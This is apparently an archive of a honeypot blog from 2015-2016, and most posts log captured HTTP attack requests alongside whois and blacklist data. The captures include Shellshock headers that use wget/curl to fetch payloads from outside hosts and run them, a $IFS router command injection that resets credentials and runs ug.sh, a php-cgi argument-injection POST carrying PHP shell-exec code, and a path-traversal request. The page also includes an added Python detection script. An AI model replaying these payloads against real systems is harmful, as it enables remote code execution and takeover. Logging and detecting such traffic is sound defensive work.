Freitag, 4. März 2016

end of life

Good morning,

as you may have already found out, the posts on this blog have been getting fewer and fewer. This is caused by the fact that my two honeypots have had some issues.

The vservers will be going down soon. So no more analytics.

Thanks to Swen for keeping the German honeypot running for so long. I am currently looking for cheap vservers around the world and talking to some people about funding the operating costs, until then....

This is the end

Donnerstag, 11. Februar 2016

159.226.162.196 - #perl wget via 204.232.209.188

BEGIN OF HTTP DATA:
2016-02-11 19:15:33
Source IP: 159.226.162.196
GET HTTP/1.1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system(" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download  http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png  ");'
Host: 109.234.106.8
Connection: Close


 END OF DATA

The HTTP server returned 404 at the time of the investigation.


Copyright (c) 2015,2016, Joerg Stephan
All rights reserved.

Disclaimer:This information is provided as-is and there is no guarantee
that blocking an IP or domain reported in this overview will not adversely
impact your business. Use all information provided on your own risk,
the author disclaims all warranty and shall not be liable for any damage
or impact caused.

159.226.162[.]196

    Whois Data (TeamCymru)
  • AS : 7497
  • IP : 159.226.162.196
  • BGP Prefix : 159.226.162.0/24
  • CC : CN
  • Registry : apnic
  • Allocated :
  • AS Name: CSTNET-AS-AP Computer Network Information Center,CN
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois

204.232.209[.]188

    Whois Data (TeamCymru)
  • AS : 33070
  • IP : 204.232.209.188
  • BGP Prefix : 204.232.192.0/19
  • CC : US
  • Registry : arin
  • Allocated : 2009-06-24
  • AS Name: RMH-14 - Rackspace Hosting,US
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Source: Local Feed Database
  • Title: 213.136.72.84 . shellshock perl via 204.232.209.188
  • Reference: http://sendmespamids.blogspot.com/2016/01/2131367284-shellshock-perl-via.html
  • In db since: 2016-01-22 08:36:12.295000

Sonntag, 7. Februar 2016

178.57.115.231 - (Russian IPs) possible DD-WRT firmware via 178.57.115.231:8081

BEGIN OF HTTP DATA:
2016-02-06 15:33:59
Source IP: 178.57.115.231
GET /cgi-bin/;nvram$IFS\set$IFS\http_passwd;nvram$IFS\set$IFS\http_username;nvram$IFS\commit;sleep$IFS ;cd$IFS\/tmp;wget$IFS\http:\/\/178.57.115.231:8081\/h\/wrt\/ug.sh;chmod$IFSÿ$IFS\/tmp/ug.sh;/bin/sh$IFS\/tmp/ug.sh HTTP/1.0
Host:195.169.125.87:8080

 END OF DATA

The ug.sh script tries to download a binary file.

Judging by the xxd and strings output of that file, it looks like a DD-WRT firmware file.


178.57.115[.]231

    Whois Data (TeamCymru)
  • AS : 60139
  • IP : 178.57.115.231
  • BGP Prefix : 178.57.112.0/21
  • CC : RU
  • Registry : ripencc
  • Allocated : 2010-02-02
  • AS Name: Z-TELECOM Z-Telecom Ltd,RU
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois

Sonntag, 24. Januar 2016

61.49.45.47 - WhatWeb/0.4.8-dev (first time seen)

BEGIN OF HTTP DATA:
2016-01-23 16:47:13
Source IP: 61.49.45.47
GET / HTTP/1.1
User-Agent: WhatWeb/0.4.8-dev
Host: 109.234.106.8:8080
Connection: close
Accept: */*
For more information see https://user-agents.me/crawler/whatweb048-dev
According to some reports on the web, this crawler is meant to identify the web applications running on a server.

61.49.45[.]47

    Whois Data (TeamCymru)
  • AS : 4808
  • IP : 61.49.45.47
  • BGP Prefix : 61.49.0.0/18
  • CC : CN
  • Registry : apnic
  • Allocated : 2001-06-28
  • AS Name: CHINA169-BJ CNCGROUP IP network China169 Beijing Province Network,CN
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/61.49.45.47

Donnerstag, 21. Januar 2016

213.136.72.84 . Shellshock perl via 204.232.209.188

BEGIN OF HTTP DATA:
2016-01-20 09:58:59
Source IP: 213.136.72.84
GET HTTP/1.1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system(" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download  http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png  ");'
Host: 195.169.125.87
Connection: Close


 END OF DATA

213.136.72[.]84

    Whois Data (TeamCymru)
  • AS : 51167
  • IP : 213.136.72.84
  • BGP Prefix : 213.136.72.0/23
  • CC : DE
  • Registry : ripencc
  • Allocated : 2000-02-28
  • AS Name: CONTABO Contabo GmbH,DE
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/213.136.72.84
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/213.136.72.84

204.232.209[.]188

    Whois Data (TeamCymru)
  • AS : 33070
  • IP : 204.232.209.188
  • BGP Prefix : 204.232.192.0/19
  • CC : US
  • Registry : arin
  • Allocated : 2009-06-24
  • AS Name: RMH-14 - Rackspace Hosting,US
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois

92.45.197.218 - Zollard php execution

BEGIN OF HTTP DATA:
2016-01-21 09:47:25
Source IP: 92.45.197.218
POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
Host: 195.169.125.87
User-Agent: Mozilla/5.0 (compatible; Zollard; Linux)
Content-Type: application/x-www-form-urlencoded
Content-Length: 1817
Connection: close

<?php
echo "Zollard";
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
{
 $disablefunc = str_replace(" ","",$disablefunc);
 $disablefunc = explode(",",$disablefunc);
}
function myshellexec($cmd)
{
 global $disablefunc;
 $result = "";
 if (!empty($cmd))
 {
  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
  elseif (($result = `$cmd`) !== FALSE) {}
  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  elseif (is_callable("passthru") and !in_array("passthru",$disabl

END OF DATA
Sadly the request was too long to be fully logged by the fake HTTP server.

Decoded, the POST request line is:
POST /cgi-bin/php?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=""+-d+open_basedir=none+-d+auto_prepend_file=php://input+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-n HTTP/1.1
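As an added example (not the blog's own code), here is a small Python triage script for captures in this blog's BEGIN OF HTTP DATA / END OF DATA format. It tags three of the patterns that appear in these posts: the Shellshock function-definition prefix in any header value (the perl/wget posts and the ping-via-Cookie post), the php-cgi argument injection shown by the decoded Zollard POST line above (decoded the way php-cgi would see it: percent-decoded and split on "+", but only when the raw query string contains no literal "="), and $IFS used as a whitespace substitute in the request path (the DD-WRT post). It also tags the mass-scanner user agents listed in the "Scanner seen" posts. The sample captures, their addresses and the rule names are constructed for this example.

```python
"""Triage honeypot captures in the BEGIN OF HTTP DATA / END OF DATA format.

Added example for this blog page, not the blog's own code.  The capture
layout is taken from the posts; the sample captures below are constructed
(documentation addresses) and the rule set is this example's own.
"""
import re
from urllib.parse import unquote

# Bash function-definition prefix used by Shellshock payloads, allowing the
# spacing variants seen in the captures: "() { :;};" and "() { :; };".
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{\s*:\s*;\s*\}\s*;")

# php-cgi -d directives that, combined, turn the request body into code.
DANGEROUS_PHP_DIRECTIVES = {
    "auto_prepend_file=php://input",
    "allow_url_include=on",
    "safe_mode=off",
    'disable_functions=""',
    "open_basedir=none",
}

# User-Agent substrings of the mass scanners named in the posts.
SCANNER_AGENTS = ("masscan", "zgrab", "muieblackcat", "WhatWeb",
                  "Nmap Scripting Engine", "Morfeus")

# One capture: timestamp line, optional "Source IP:" line, request line,
# headers, optional blank line and body, closed by "END OF DATA".
CAPTURE_RE = re.compile(r"BEGIN OF HTTP DATA:\n(.*?)\n\s*END OF DATA", re.S)


def parse_captures(text):
    """Split a log into dicts with timestamp, source_ip, request_line, headers, body."""
    captures = []
    for block in CAPTURE_RE.findall(text):
        lines = block.split("\n")
        cap = {"timestamp": lines[0].strip(), "source_ip": None,
               "request_line": None, "headers": {}, "body": ""}
        i = 1
        if lines[i].startswith("Source IP:"):
            # "Source IP: a.b.c.d (2nd: ...)" -> keep the first address only
            cap["source_ip"] = lines[i].split(":", 1)[1].split()[0]
            i += 1
        cap["request_line"] = lines[i].strip()
        i += 1
        while i < len(lines) and lines[i].strip():      # headers end at a blank line
            name, _, value = lines[i].partition(":")
            cap["headers"][name.strip().lower()] = value.strip()
            i += 1
        cap["body"] = "\n".join(lines[i + 1:]).strip()
        captures.append(cap)
    return captures


def php_cgi_argv(request_line):
    """argv that php-cgi would build from the query string: only when the raw
    query has no literal '=', percent-decode it and split on '+'."""
    parts = request_line.split()
    if len(parts) < 2:
        return []
    _, _, query = parts[1].partition("?")
    if not query or "=" in query:
        return []
    return [unquote(arg) for arg in query.split("+") if arg]


def triage(cap):
    """Return the list of tags that apply to one parsed capture."""
    tags = []
    for name, value in cap["headers"].items():           # rule 1: Shellshock
        if SHELLSHOCK_RE.search(value):
            tags.append("shellshock:" + name)
    hits = DANGEROUS_PHP_DIRECTIVES.intersection(php_cgi_argv(cap["request_line"]))
    if hits:                                             # rule 2: php-cgi argv
        tags.append("php-cgi-argv:" + ",".join(sorted(hits)))
    if "$IFS" in cap["request_line"]:                    # rule 3: $IFS in path
        tags.append("ifs-command-injection")
    ua = cap["headers"].get("user-agent", "").lower()    # rule 4: scanners
    tags.extend("scanner:" + a for a in SCANNER_AGENTS if a.lower() in ua)
    return tags


def triage_log(text):
    """(source_ip, method, tags) for every capture in the log text."""
    return [(c["source_ip"], c["request_line"].split()[0], triage(c))
            for c in parse_captures(text)]


# Constructed sample log in the blog's capture format (addresses are documentation ranges).
SAMPLE_LOG = """BEGIN OF HTTP DATA:
2016-02-11 19:15:33
Source IP: 198.51.100.10
GET HTTP/1.1 HTTP/1.1
Accept: */*
User-Agent: () { :;};/usr/bin/perl -e 'print "X";system(" wget http://203.0.113.5/slice.png ");'
Host: 192.0.2.1
Connection: Close

 END OF DATA
BEGIN OF HTTP DATA:
2016-01-21 09:47:25
Source IP: 198.51.100.20
POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74 HTTP/1.1
Host: 192.0.2.1
User-Agent: Mozilla/5.0 (compatible; Zollard; Linux)

<?php
echo "Zollard";
END OF DATA
BEGIN OF HTTP DATA:
2016-02-06 15:33:59
Source IP: 198.51.100.30
GET /cgi-bin/;sleep$IFS5 HTTP/1.0
Host: 192.0.2.1:8080
END OF DATA
BEGIN OF HTTP DATA:
2016-01-23 16:47:13
Source IP: 198.51.100.40
GET / HTTP/1.1
User-Agent: WhatWeb/0.4.8-dev
Host: 192.0.2.1:8080
END OF DATA
"""

if __name__ == "__main__":
    for src, method, tags in triage_log(SAMPLE_LOG):
        print(src, method, tags or ["-"])
```

Captures that the fake server cut off before "END OF DATA" (as in the authLogin.cgi posts) are skipped by CAPTURE_RE; run over a real capture file, the output is a per-source tag list that can feed the blacklist.
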

92.45.197[.]218

    Whois Data (TeamCymru)
  • AS : 34984
  • IP : 92.45.197.218
  • BGP Prefix : 92.45.196.0/23
  • CC : TR
  • Registry : ripencc
  • Allocated : 2007-12-17
  • AS Name: TELLCOM-AS TELLCOM ILETISIM HIZMETLERI A.S.,TR
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois


Mittwoch, 13. Januar 2016

Scanner seen on January 14, 2016

  • 185.130.5.207 - muieblackcat
  • 37.142.32.222 - masscan/1.0
  • 149.78.19.136 -  masscan/1.0
  • 195.169.125.87 -  zgrab/0.x 
  • 185.130.5.235 -  muieblackcat

185.130.5[.]207

    Whois Data (TeamCymru)
  • AS : 203569
  • IP : 185.130.5.207
  • BGP Prefix : 185.130.5.0/24
  • CC : LT
  • Registry : ripencc
  • Allocated : 2015-12-04
  • AS Name: SILK-AS Sindicate Group Ltd,LT
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/185.130.5.207
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/185.130.5.207
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

37.142.32[.]222

    Whois Data (TeamCymru)
  • AS : 12849
  • IP : 37.142.32.222
  • BGP Prefix : 37.142.32.0/22
  • CC : IL
  • Registry : ripencc
  • Allocated : 2012-02-29
  • AS Name: HOTNET-IL Hot-Net internet services Ltd.,IL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/37.142.32.222

149.78.19[.]136

    Whois Data (TeamCymru)
  • AS : 12849
  • IP : 149.78.19.136
  • BGP Prefix : 149.78.0.0/19
  • CC : US
  • Registry : arin
  • Allocated :
  • AS Name: HOTNET-IL Hot-Net internet services Ltd.,IL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/149.78.19.136
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/149.78.19.136
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

195.169.125[.]87

    Whois Data (TeamCymru)
  • AS : 1103
  • IP : 195.169.125.87
  • BGP Prefix : 195.169.125.0/24
  • CC : NL
  • Registry : ripencc
  • Allocated :
  • AS Name: SURFNET-NL SURFnet, The Netherlands,NL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Source: Local Feed Database
  • Title: 50.118.172.34 / 195.169.125.87 - http javascript/html submission
  • Reference: http://sendmespamids.blogspot.com/2015/09/5011817234-http-javascripthtml.html
  • In db since: 2015-09-24 08:17:16.658000
    Source: Local Feed Database
  • Title: 46.172.71.251, 195.169.125.87 - to ping 212.47.238.143
  • Reference: http://sendmespamids.blogspot.com/2016/01/4617271251-19516912587-to-ping.html
  • In db since: 2016-01-09 11:54:24.541062

185.130.5[.]235

    Whois Data (TeamCymru)
  • AS : 203569
  • IP : 185.130.5.235
  • BGP Prefix : 185.130.5.0/24
  • CC : LT
  • Registry : ripencc
  • Allocated : 2015-12-04
  • AS Name: SILK-AS Sindicate Group Ltd,LT
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/185.130.5.235
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/185.130.5.235
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt

83.54.165.57 - Shellshock wget via http://192.192.78.216:9090

BEGIN OF HTTP DATA:
2016-01-13 08:48:44
Source IP: 83.54.165.57
GET /cgi-bin/authLogin.cgi HTTP/1.1
Host: 127.0.0.1
User-Agent: () { :; }; /bin/rm -rf /tmp/S0.php && /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -c http://192.192.78.216:9090/gH/S0.php -O /tmp/S0.sh  && /bin/sh /tmp/S0.sh 0<&1 2>&1

83.54.165[.]57

    Whois Data (TeamCymru)
  • AS : 3352
  • IP : 83.54.165.57
  • BGP Prefix : 83.54.0.0/16
  • CC : ES
  • Registry : ripencc
  • Allocated : 2004-10-07
  • AS Name: TELEFONICA_DE_ESPANA TELEFONICA DE ESPANA,ES
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/83.54.165.57

192.192.78[.]216

    Whois Data (TeamCymru)
  • AS : 1659
  • IP : 192.192.78.216
  • BGP Prefix : 192.192.0.0/16
  • CC : TW
  • Registry : apnic
  • Allocated :
  • AS Name: ERX-TANET-ASN1 Taiwan Academic Network (TANet) Information Center,TW
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois


Dienstag, 12. Januar 2016

Scanner seen on January 11 and 12, 2016

  • 208.100.26.231 - Nmap Scripting Engine
  • 141.212.122.81 -  zgrab/0.x
  • 141.212.122.145 -  zgrab/0.x

208.100.26[.]231

    Whois Data (TeamCymru)
  • AS : 32748
  • IP : 208.100.26.231
  • BGP Prefix : 208.100.0.0/18
  • CC : US
  • Registry : arin
  • Allocated : 2006-02-17
  • AS Name: STEADFAST - Steadfast Networks,US
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/208.100.26.231
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt
    Source: Local Feed Database
  • Title: 208.100.26.231 - fire on port 8080
  • Reference: http://sendmespamids.blogspot.com/2015/09/20810026231-fire-on-port-8080.html
  • In db since: 2015-09-24 08:17:16.658000
    Source: Local Feed Database
  • Title: 208.100.26.231 - mongodb scanning ip
  • Reference: http://sendmespamids.blogspot.com/2015/10/20810026231-mongodb-scanning-ip.html
  • In db since: 2015-10-11 10:10:48.742000

141.212.122[.]81

    Whois Data (TeamCymru)
  • AS : 36375
  • IP : 141.212.122.81
  • BGP Prefix : 141.212.0.0/16
  • CC : US
  • Registry : arin
  • Allocated :
  • AS Name: UMICH-AS-5 - University of Michigan,US
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/141.212.122.81

141.212.122[.]145

    Whois Data (TeamCymru)
  • AS : 36375
  • IP : 141.212.122.145
  • BGP Prefix : 141.212.0.0/16
  • CC : US
  • Registry : arin
  • Allocated :
  • AS Name: UMICH-AS-5 - University of Michigan,US
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/141.212.122.145
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

Samstag, 9. Januar 2016

85.73.42.84 - wget via http://lliillii.altervista.org/io.php

BEGIN OF HTTP DATA:
2016-01-08 10:07:22
Source IP: 85.73.42.84
GET /cgi-bin/authLogin.cgi HTTP/1.1
Host: 127.0.0.1
User-Agent: () { :; }; /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -q -c http://lliillii.altervista.org/io.php 0<&1 2>&1

85.73.42[.]84

    Whois Data (TeamCymru)
  • AS : 6799
  • IP : 85.73.42.84
  • BGP Prefix : 85.73.0.0/16
  • CC : GR
  • Registry : ripencc
  • Allocated : 2006-05-17
  • AS Name: OTENET-GR Ote SA (Hellenic Telecommunications Organisation),GR
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois

Scanner seen on January 9, 2016

  • 93.174.93.203 - masscan/1.0
  • 141.212.122.145 - zgrab/0.x
  • 69.30.217.226 - muieblackcat

93.174.93[.]203

    Whois Data (TeamCymru)
  • AS : 29073
  • IP : 93.174.93.203
  • BGP Prefix : 93.174.88.0/21
  • CC : NL
  • Registry : ripencc
  • Allocated : 2008-06-20
  • AS Name: ECATEL-AS Quasi Networks LTD.,NL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/93.174.93.203
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/93.174.93.203
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

141.212.122[.]145

    Whois Data (TeamCymru)
  • AS : 36375
  • IP : 141.212.122.145
  • BGP Prefix : 141.212.0.0/16
  • CC : US
  • Registry : arin
  • Allocated :
  • AS Name: UMICH-AS-5 - University of Michigan,US
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/141.212.122.145
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/141.212.122.145
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

69.30.217[.]226

    Whois Data (TeamCymru)
  • AS : 32097
  • IP : 69.30.217.226
  • BGP Prefix : 69.30.192.0/18
  • CC : US
  • Registry : arin
  • Allocated : 2004-03-16
  • AS Name: WII-KC - WholeSale Internet, Inc.,US
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/69.30.217.226

Donnerstag, 7. Januar 2016

84.246.228.80 - access cnf/db.php

BEGIN OF HTTP DATA:
2016-01-07 21:11:32
Source IP: 84.246.228.80
GET /etc/lib/pChart2/examples/index.php?Action=View&Script=../../../../cnf/db.php HTTP/1.1
User-Agent: HTTP_Request2/2.2.1 (http://pear.php.net/package/http_request2) PHP/5.3.3
Host: 109.234.106.8
Accept-Encoding: gzip, deflate


84.246.228[.]80

    Whois Data (TeamCymru)
  • AS : 34274
  • IP : 84.246.228.80
  • BGP Prefix : 84.246.224.0/21
  • CC : FR
  • Registry : ripencc
  • Allocated : 2004-10-25
  • AS Name: ELBMULTIMEDIA ELB MULTIMEDIA,FR
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois

Scanner seen on January 8, 2016

  • 185.130.5.207 - muieblackcat
  • 141.212.122.64 - zgrab/0.x
  • 5.28.172.193 - masscan/1.0

185.130.5[.]207

    Whois Data (TeamCymru)
  • AS : 203569
  • IP : 185.130.5.207
  • BGP Prefix : 185.130.5.0/24
  • CC : LT
  • Registry : ripencc
  • Allocated : 2015-12-04
  • AS Name: SILK-AS Sindicate Group Ltd,LT
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/185.130.5.207
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/185.130.5.207
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

141.212.122[.]64

    Whois Data (TeamCymru)
  • AS : 36375
  • IP : 141.212.122.64
  • BGP Prefix : 141.212.0.0/16
  • CC : US
  • Registry : arin
  • Allocated :
  • AS Name: UMICH-AS-5 - University of Michigan,US
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 8.6
  • Reference: https://exchange.xforce.ibmcloud.com/ip/141.212.122.64
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/141.212.122.64
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

5.28.172[.]193

    Whois Data (TeamCymru)
  • AS : 12849
  • IP : 5.28.172.193
  • BGP Prefix : 5.28.160.0/20
  • CC : IL
  • Registry : ripencc
  • Allocated : 2012-05-08
  • AS Name: HOTNET-IL Hot-Net internet services Ltd.,IL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/5.28.172.193

Mittwoch, 6. Januar 2016

Scanner seen on January 7, 2016

  • 149.78.19.136 - masscan/1.0
  • 213.57.67.192 - masscan/1.0
  • 94.102.48.195 - masscan/1.0
  • 195.169.125.87 - zgrab/0.x
  • 85.25.217.27 -  muieblackcat

149.78.19[.]136

    Whois Data (TeamCymru)
  • AS : 12849
  • IP : 149.78.19.136
  • BGP Prefix : 149.78.0.0/19
  • CC : US
  • Registry : arin
  • Allocated :
  • AS Name: HOTNET-IL Hot-Net internet services Ltd.,IL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/149.78.19.136
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/149.78.19.136

213.57.67[.]192

    Whois Data (TeamCymru)
  • AS : 12849
  • IP : 213.57.67.192
  • BGP Prefix : 213.57.67.0/24
  • CC : IL
  • Registry : ripencc
  • Allocated :
  • AS Name: HOTNET-IL Hot-Net internet services Ltd.,IL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois

94.102.48[.]195

    Whois Data (TeamCymru)
  • AS : 29073
  • IP : 94.102.48.195
  • BGP Prefix : 94.102.48.0/20
  • CC : NL
  • Registry : ripencc
  • Allocated : 2008-08-29
  • AS Name: ECATEL-AS Quasi Networks LTD.,NL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/94.102.48.195
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/94.102.48.195
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

195.169.125[.]87

    Whois Data (TeamCymru)
  • AS : 1103
  • IP : 195.169.125.87
  • BGP Prefix : 195.169.125.0/24
  • CC : NL
  • Registry : ripencc
  • Allocated :
  • AS Name: SURFNET-NL SURFnet, The Netherlands,NL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Source: Local Feed Database
  • Title: 50.118.172.34 / 195.169.125.87 - http javascript/html submission
  • Reference: http://sendmespamids.blogspot.com/2015/09/5011817234-http-javascripthtml.html
  • In db since: 2015-09-24 08:17:16.658000

85.25.217[.]27

    Whois Data (TeamCymru)
  • AS : 8972
  • IP : 85.25.217.27
  • BGP Prefix : 85.25.217.0/24
  • CC : DE
  • Registry : ripencc
  • Allocated : 2005-12-05
  • AS Name: PLUSSERVER-AS PlusServer AG,DE
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 7.1
  • Reference: https://exchange.xforce.ibmcloud.com/ip/85.25.217.27
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
